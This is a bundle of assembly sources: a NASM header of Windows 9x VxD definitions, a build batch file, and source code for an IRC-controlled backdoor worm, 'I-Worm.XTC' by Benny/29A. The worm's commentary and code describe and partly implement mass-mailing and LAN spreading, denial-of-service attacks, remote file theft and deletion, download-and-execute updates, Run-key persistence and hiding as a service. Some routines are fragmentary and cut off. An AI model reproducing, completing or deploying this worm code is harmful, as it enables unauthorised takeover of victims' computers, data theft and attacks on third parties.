ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WINDDK.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VXDN.INC]ÄÄÄ
;////////////////////////////////////////////////////////////
;// vxdn.inc
;//
;// VxD definitions for NASM
;//
;// Collective effort of fOSSiL and The Owl =)
;//
;// 06-Aug-1999 fOSSiL Initial version
;// 16-Jan-2000 The Owl bunch of structs and equates
;// 16-Jan-2000 fOSSiL Separated Auto-generated stuff from hand-made, better MASM-compat
;// 18-Jan-2000 The Owl modified DDB builder macro
%ifndef INCLUDED_VXDN_INC
%define INCLUDED_VXDN_INC
DIOC_GETVERSION EQU 0H
DIOC_OPEN EQU DIOC_GETVERSION
DIOC_CLOSEHANDLE EQU -1
%macro VxD_Service 2
@@%2 EQU (%1_Device_ID << 16) | __Cur_Service_Num__
%assign __Cur_Service_Num__ (__Cur_Service_Num__ + 1)
%ifdef Create_Service_Table_%1
dd %2
%endif
%endmacro
%macro Begin_Service_Table 1
%assign __Cur_Service_Num__ 0
%define %1_Service VxD_Service %1,
%ifdef Create_Service_Table_%1
[segment _LDATA]
%1_Service_Table:
%endif
%endmacro
%macro End_Service_Table 1
Num_%1_Services equ __Cur_Service_Num__
%undef __Cur_Service_Num__
%undef %1_Service
%ifdef Create_Service_Table_%1
__SECT__
%endif
%endmacro
%include "winddk.inc"
struc cb_s
CB_VM_Status resd 1
CB_High_Linear resd 1
CB_Client_Pointer resd 1
CB_VMID resd 1
CB_Signature resd 1
endstruc
struc tcb_s
TCB_Flags resd 1 ; 00
TCB_Reserved1 resd 1 ; 04
TCB_Reserved2 resd 1 ; 08
TCB_Signature resd 1 ; 0C
TCB_ClientPtr resd 1 ; 10
TCB_VMHandle resd 1 ; 14
TCB_ThreadId resw 1 ; 18
TCB_PMLockOrigSS resw 1 ; 1A
TCB_PMLockOrigESP resd 1 ; 1C
TCB_PMLockOrigEIP resd 1 ; 20
TCB_PMLockStackCount resd 1 ; 24
TCB_PMLockOrigCS resw 1 ; 28
TCB_PMPSPSelector resw 1 ; 2A
TCB_ThreadType resd 1 ; 2C
TCB_pad1 resw 1 ;
TCB_pad2 resb 1 ;
TCB_extErrLocus resb 1 ;
TCB_extErr resw 1 ;
TCB_extErrAction resb 1 ;
TCB_extErrClass resb 1 ;
TCB_extErrPtr resd 1 ;
endstruc
SCHED_OBJ_ID_THREAD EQU 42434854H
THFLAG_SUSPENDED_BIT EQU 03H
THFLAG_SUSPENDED EQU (1 << THFLAG_SUSPENDED_BIT)
THFLAG_NOT_EXECUTEABLE_BIT EQU 04H
THFLAG_NOT_EXECUTEABLE EQU (1 << THFLAG_NOT_EXECUTEABLE_BIT)
THFLAG_THREAD_CREATION_BIT EQU 08H
THFLAG_THREAD_CREATION EQU (1 << THFLAG_THREAD_CREATION_BIT)
THFLAG_THREAD_BLOCKED_BIT EQU 0AH
THFLAG_THREAD_BLOCKED EQU (1 << THFLAG_THREAD_BLOCKED_BIT)
THFLAG_RING0_THREAD_BIT EQU 1CH
THFLAG_RING0_THREAD EQU (1 << THFLAG_RING0_THREAD_BIT)
THFLAG_ASYNC_THREAD_BIT EQU 1FH
THFLAG_ASYNC_THREAD EQU (1 << THFLAG_ASYNC_THREAD_BIT)
THFLAG_CHARSET_BITS EQU 10H
THFLAG_CHARSET_MASK EQU (3 << THFLAG_CHARSET_BITS)
THFLAG_ANSI EQU (0 << THFLAG_CHARSET_BITS)
THFLAG_OEM EQU (1 << THFLAG_CHARSET_BITS)
THFLAG_UNICODE EQU (2 << THFLAG_CHARSET_BITS)
THFLAG_RESERVED EQU (3 << THFLAG_CHARSET_BITS)
THFLAG_EXTENDED_HANDLES_BIT EQU 12H
THFLAG_EXTENDED_HANDLES EQU (1 << THFLAG_EXTENDED_HANDLES_BIT)
THFLAG_OPEN_AS_IMMOVABLE_FILE_BIT EQU 13H
THFLAG_OPEN_AS_IMMOVABLE_FILE EQU (1 << THFLAG_OPEN_AS_IMMOVABLE_FILE_BIT)
struc pmcb_s
PMCB_Flags resd 1
PMCB_Parent resd 1
endstruc
struc Exception_Handler_Struc
EHS_Reserved resd 1
EHS_Start_EIP resd 1
EHS_End_EIP resd 1
EHS_Handler resd 1
endstruc
struc VMFaultInfo
VMFI_EIP resd 1
VMFI_CS resw 1
VMFI_Ints resw 1
endstruc
LF_ASYNC_BIT EQU 0
LF_ASYNC EQU (1 << LF_ASYNC_BIT)
LF_USE_HEAP_BIT EQU 1
LF_USE_HEAP EQU (1 << LF_USE_HEAP_BIT)
LF_ALLOC_ERROR_BIT EQU 2
LF_ALLOC_ERROR EQU (1 << LF_ALLOC_ERROR_BIT)
LF_SWAP EQU (LF_USE_HEAP+(1 << 3))
VXDLDR_ERR_OUT_OF_MEMORY EQU 1
VXDLDR_ERR_IN_DOS EQU 2
VXDLDR_ERR_FILE_OPEN_ERROR EQU 3
VXDLDR_ERR_FILE_READ EQU 4
VXDLDR_ERR_DUPLICATE_DEVICE EQU 5
VXDLDR_ERR_BAD_DEVICE_FILE EQU 6
VXDLDR_ERR_DEVICE_REFUSED EQU 7
VXDLDR_ERR_NO_SUCH_DEVICE EQU 8
VXDLDR_ERR_DEVICE_UNLOADABLE EQU 9
VXDLDR_ERR_ALLOC_V86_AREA EQU 10
VXDLDR_ERR_BAD_API_FUNCTION EQU 11
VXDLDR_ERR_MAX EQU 11
VXDLDR_NOTIFY_OBJECTUNLOAD EQU 0
VXDLDR_NOTIFY_OBJECTLOAD EQU 1
VXDLDR_APIFUNC_GETVERSION EQU 0
VXDLDR_APIFUNC_LOADDEVICE EQU 1
VXDLDR_APIFUNC_UNLOADDEVICE EQU 2
struc DIOCParams
.Internal1 resd 1
.VMHandle resd 1
.Internal2 resd 1
.dwIoControlCode resd 1
.lpvInBuffer resd 1
.cbInBuffer resd 1
.lpvOutBuffer resd 1
.cbOutBuffer resd 1
.lpcbBytesReturned resd 1
.lpoOverlapped resd 1
.hDevice resd 1
.tagProcess resd 1
endstruc
struc DIOCRegs
.reg_EBX resd 1
.reg_EDX resd 1
.reg_ECX resd 1
.reg_EAX resd 1
.reg_EDI resd 1
.reg_ESI resd 1
.reg_Flags resd 1
endstruc
%ifndef FILE_FLAG_OVERLAPPED
struc _OVERLAPPED
.O_Internal resd 1
.O_InternalHigh resd 1
.O_Offset resd 1
.O_OffsetHigh resd 1
.O_hEvent resd 1
endstruc
%endif
%macro GetDeviceServiceOrdinal 2
mov %1, @@%2
%endmacro
%macro VxDJmp 1
db 0xCD, 0x20
dd (@@%1 | 0x80000000)
%endmacro
%define VxDjmp VxDJmp
%macro VMMJmp 1
%if (@@%1 >> 16) <> VMM_Device_ID
%error %1 is not a VMM Service
%endif
VxDJmp %1
%endmacro
struc VxD_Desc_Block
DDB_Next resd 1
DDB_SDK_Version resw 1; DW DDK_VERSION
DDB_Req_Device_Number resw 1; DW UNDEFINED_DEVICE_ID
DDB_Dev_Major_Version resb 1; DB 0
DDB_Dev_Minor_Version resb 1; DB 0
DDB_Flags resw 1; DW 0
DDB_Name resb 8; DB " "
DDB_Init_Order resd 1; DD UNDEFINED_INIT_ORDER
DDB_Control_Proc resd 1; DD ?
DDB_V86_API_Proc resd 1; DD 0
DDB_PM_API_Proc resd 1; DD 0
DDB_V86_API_CSIP resd 1; DD 0
DDB_PM_API_CSIP resd 1; DD 0
DDB_Reference_Data resd 1; DD ?
DDB_Service_Table_Ptr resd 1; DD 0
DDB_Service_Table_Size resd 1; DD 0
DDB_Win32_Service_Table resd 1; DD 0
DDB_Prev resd 1; DD 'Prev'
DDB_Size resd 1; DD SIZE(VxD_Desc_Block)
DDB_Reserved1 resd 1; DD 'Rsv1'
DDB_Reserved2 resd 1; DD 'Rsv2'
DDB_Reserved3 resd 1; DD 'Rsv3'
endstruc
;
; Params 5-9 are optional, since most of the time they are generic
; params: devname, quoted devname, major, minor, devid, initorder, v86, pm, ref
; Control_Proc must be named devname_Control
;
%macro Declare_Virtual_Device 4-9 UNDEFINED_DEVICE_ID, UNDEFINED_INIT_ORDER, 0, 0, 0
global %1_DDB
%1_DDB:
istruc VxD_Desc_Block
at DDB_Next, dd 0
at DDB_SDK_Version, dw DDK_VERSION
at DDB_Req_Device_Number, dw %5
at DDB_Dev_Major_Version, db %3
at DDB_Dev_Minor_Version, db %4
at DDB_Flags, dw 0
%%start:
at DDB_Name, db %2
%%end:
TIMES 8-(%%end-%%start) db ' '
at DDB_Init_Order, dd %6
at DDB_Control_Proc, dd %1_Control
at DDB_V86_API_Proc, dd %7
at DDB_PM_API_Proc, dd %8
at DDB_V86_API_CSIP, dd 0
at DDB_PM_API_CSIP, dd 0
at DDB_Reference_Data, dd %9
%ifdef Create_Service_Table_%1
at DDB_Service_Table_Ptr, dd %1_Service_Table
at DDB_Service_Table_Size, dd Num_%1_Services
%else
at DDB_Service_Table_Ptr, dd 0
at DDB_Service_Table_Size, dd 0
%endif
at DDB_Win32_Service_Table, dd 0
at DDB_Prev, db 'verP'
at DDB_Size, dd VxD_Desc_Block_size
at DDB_Reserved1, db '1vsR'
at DDB_Reserved2, db '2vsR'
at DDB_Reserved3, db '3vsR'
iend
%endmacro
%macro Trace_Out 1
[segment _LDATA]
%%msg: db %1, 13, 10, 0
__SECT__
push dword %%msg
VMMCall _Trace_Out_Service
%endmacro
%macro Trace_Outcc 2
j%-1 %%cont
Trace_Out %2
%%cont:
%endmacro
%macro Trace_OutE 1
Trace_Outcc e, %1
%endmacro
%define Trace_OutZ Trace_OutE
%macro Trace_OutNE 1
Trace_Outcc ne, %1
%endmacro
%define Trace_OutNZ Trace_OutNE
%macro Trace_OutC 1
Trace_Outcc c, %1
%endmacro
%macro Trace_OutNC 1
Trace_Outcc nc, %1
%endmacro
%endif
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VXDN.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ
@echo off
if exist v.exe del v.exe
if exist v.obj del v.obj
nasmw -f win32 v.asm
gorc /r vres.rc
alink -entry start -oPE v.obj vres.res kernel32.lib user32.lib gdi32.lib
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ
COMMENT#
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Project XTC - I-Worm.XTC ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Have you ever thought about internet worm you could have absolute control
above? The worm you could control,plan missions (DOS attax, targets to infect),
which the worm will make? The worm, which will give you access to infected
computer,such like Back Orifice? The worm you could easilly control by IRC and
update by FTP? Very fast spreading worm with stealth, anti-* features and very
small size? Have you ever thought about this? Yeah? You were not alone. I also
like such idea, that's why I coded this worm. It can do exactly the same I
wrote above. For additional informations, read my article "Worms in 21st
century".
This worm was supposed to be my first one. But while I was coding this very
complex worm, I got very bored from that, so meanwhile I coded I-Worm.Energy,
Before I finished it, I got many new ideaz how should my next worm work. I
decided to not implement complex spreading via exploits (that was the main idea
of this worm), finish it ASAP and start to work on the other one.
I finished this one. It was hard work and the result is pretty good looking
worm :-) It is very useful to place this worm to hacked computerz, see below
why. I don't want to write long description, I will just briefly list some of
its main featurez. Have a fun!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
³ Command ³ Description ³
³ ³ ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ password ³ logs on to worm ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ nopassword ³ logs off from worm ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ dos ³ starts with DOS attack ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ stopdos ³ stops the DOS attack ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ spreadon ³ starts with mail spreading ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ spreadoff ³ stops the mail spreading ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ spreadto ³ sends itself to specified e-mail address ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ lanspread ³ starts with LAN spreading ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ reconnect ³ terminates itself and executes itself again ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ exitprocess ³ terminates itself ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ reboot ³ reboots computer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ leave ³ cleans up and delete itself from infected computer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ update ³ downloads file from specified URL and executes it ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ ircsend ³ runs the specified IRC command ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ mark ³ payload, sets some default pagez of MSIE to ³
³ ³ http://www.therainforestsite.com ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ whois ³ replies if infected computer has the same IP as the specified ³
³ ³ one ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ machine ³ retrieves the name of infected computer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ info ³ retrives some informationz about itself ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ sendme ³ sends specified file to user via DCC ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 1, DCC SEND ³ accepts specified file via DCC ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ pwd ³ retrieves current directory ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ cd ³ changes current directory ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ md ³ creates new directory ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ rd ³ removes specified directory ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ dir ³ lists all filenamez which match specified mask ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ del ³ removes specified file ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ move ³ moves/renames specified file ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ copy ³ copies specified file ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ exec ³ executes specified program ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Everytime after IRC connection is established the worm sends to public window
its version number. Other wormz will check it and if their version number is
bigger, they will send UPDATE command with the URL from which they were lastly
updated.
I think longer description is not needed, the code speaks by itself. If you
have any questionz, feel free to mail me... Have a fun!
ÚÄÄÄÄÄÄÄÄ¿
³ Greetz ³
ÀÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
#
.586p
.model flat,stdcall ;standard beginning
;of win32asm code
include win32api.inc
include useful.inc
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
.data
msg_PASS db 'password ' ;commands that are intercepted
msg_NOPASS db 'nopassword' ;by worm on IRC
msg_DOS db 'dos '
msg_SPREADON db 'spreadon'
msg_SPREADOFF db 'spreadoff'
msg_RECONN db 'reconnect'
msg_EXITPROC db 'exitprocess'
msg_GETCDIR db 'pwd'
msg_SETCDIR db 'cd '
msg_DIR db 'dir'
msg_MD db 'md '
msg_RD db 'rd '
msg_DEL db 'del '
msg_MOVE db 'move '
msg_INFO db 'info'
msg_MACHINE db 'machine'
msg_DCCRECV db 1,'DCC SEND '
msg_SENDME db 'sendme '
msg_COPY db 'copy '
msg_LEAVE db 'leave'
msg_MARK db 'mark'
msg_STOPDOS db 'stopdos'
msg_IRCSEND db 'ircsend '
msg_EXEC db 'exec '
msg_WHOIS db 'whois'
msg_LAN db 'lanspread'
msg_REBOOT db 'reboot'
msg_SPREADTO db 'spreadto '
db 11h
dec_buff db 10 dup (?) ;dec->ascii conversion buffer
push 5000
call Sleep ;wait 5 minutez
push 1
call SetErrorMode ;set this win-shit
push MAX_PATH
push offset wormname2
push 0
call GetModuleFileNameA ;get worm filename
mov [wormname2_size],eax ;save the size
push edx
call Sleep ;wait random time long
;this procedure can copy the worm file to system directory of Windows and
;execute it
CopyWorm Proc
mov esi,edi
mov edi,offset wormname ;copy the filename to
@copysz ;buffer
mov eax,'res\'
stosd
mov eax,'eciv'
stosd
mov eax,'xe.s'
stosd
push 'e'
pop eax
stosw ;create windir\services.exe
pop edi ;filename
push edi
push esi
mov esi,edi
@endsz
dec esi
mov edi,esi
pop esi
mov al,20h
stosb
@copysz
pop edi ;create the command line
push 0
push edi
call WinExec ;and execute worm
ret ;from system directory
CopyWorm EndP
push 10000h
push offset up_xtc+5
push esi
call OpenServiceA
xchg eax,ecx
jecxz e_scm2
push ecx
push ecx
call DeleteService ;delete service
call CloseServiceHandle
push eax
call CloseServiceHandle
e_scm1: push esi
call CloseServiceHandle ;close all opened handlez
ret
push 12345678h
wormname2_size = dword ptr $-4
push offset wormname2
push 1
push offset up_xtc+5
run_key = $+5
@pushsz 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
push 80000002h ;modify registry so
call SHSetValueA ;worm will be executed
;every start of windows
@pushsz 'Kernel32.dll'
call GetModuleHandleA ;get base address of K32
xchg eax,ecx
jecxz end_hide
@pushsz 'RegisterServiceProcess'
push ecx
call GetProcAddress ;get ptr to API
xchg eax,ecx
jecxz end_hide
push 1
push 0
call ecx ;register as service
end_hide: ;process under Win9x
ret
HideWorm EndP
mov eax,[eax+HOSTENT_IP]
mov eax,[eax]
mov [IRC_sock.sin_addr],eax
push PCL_NONE
push SOCK_STREAM
push AF_INET
call socket ;create socket
inc eax
je end_wsa
dec eax
mov [hSocket],eax ;save its handle
push sockSize
push offset IRC_sock
push [hSocket]
call connect ;connect to IRC server
inc eax
je end_irc_socket
new_nick:
call GenerateNickName ;generate random nickaname
sub edi,offset nickname
add edi,5
mov ecx,edi
mov esi,offset irc_nick
call irc_send ;send the nick
test ecx,ecx
je end_irc_socket
push 14
pop ecx
mov esi,offset irc_user
call irc_send ;send user infos
test ecx,ecx
je end_irc_socket
mov ecx,1000
call irc_recv ;get server reply
test eax,eax
je end_irc_socket
inc eax
je end_irc_socket
mov ecx,esi
cmp [esi],'GNIP'
jne s_pong
mov byte ptr [esi+1],'O'
push esi
l_ping: lodsb
cmp al,0Ah
jne l_ping
sub ecx,esi
neg ecx
pop esi
call irc_send ;send PONG! if PING?
push 19
pop ecx
mov esi,offset irc_join
call irc_send ;send the JOIN command
jecxz end_irc_socket
push 22
pop ecx
mov esi,offset irc_mode1
call irc_send ;set channel modez
jecxz end_irc_socket
push 17
pop ecx
mov esi,offset irc_mode2
call irc_send ;--- "" ---
jecxz end_irc_socket
mov ecx,300h
call irc_recv ;get server reply
test eax,eax
je end_irc_socket
inc eax
je end_irc_socket
and [password_passed],0 ;no superuser logged yet
call @lupd
db 'PRIVMSG #xtcdan :!ver0001',0dh,0ah
@lupd: pop esi
push 27
pop ecx
call irc_send ;send worms version code
inc eax
je end_irc_socket
end_irc_socket:
push 12345678h
hSocket = dword ptr $-4
call closesocket ;close connection
end_wsa:call WSACleanup ;clean up
end_irc_man:
irc_RECONN:
ret
IRCConnect EndP
irc_manage_pop:
pop esi
;this procedure can analyse IRC commandz and make the proper actionz
irc_manage Proc
call GetTickCount ;get the time
xchg eax,ebp
call irc_recv_100h ;get IRC reply
push eax
call GetTickCount ;get the time
xchg eax,ecx
pop eax
test eax,eax
je end_irc_man
inc eax
je end_irc_socket
sub ecx,ebp
cmp ecx,5*60000
jb no_idle ;quit if nothing
ret ;happened in 5 minutez
no_idle:cmp [esi],'GNIP'
je do_pong ;make the PONG! reply
inc esi ;if needed
push esi
@endspc
cmp [esi],'VIRP'
jne irc_manage_pop
cmp [esi+4],2047534Dh ;quit if its not PRIVMSG
jne irc_manage_pop ;command
push 9
pop ecx
mov edi,offset irc_tmp
mov edx,edi
movsd
movsd ;copy the first part
pop esi ;or the command
cmp [esi],'adpu'
jne @m_nx0
cmp word ptr [esi+4],'et'
jne @m_nx0
cmp byte ptr [esi+6],20h
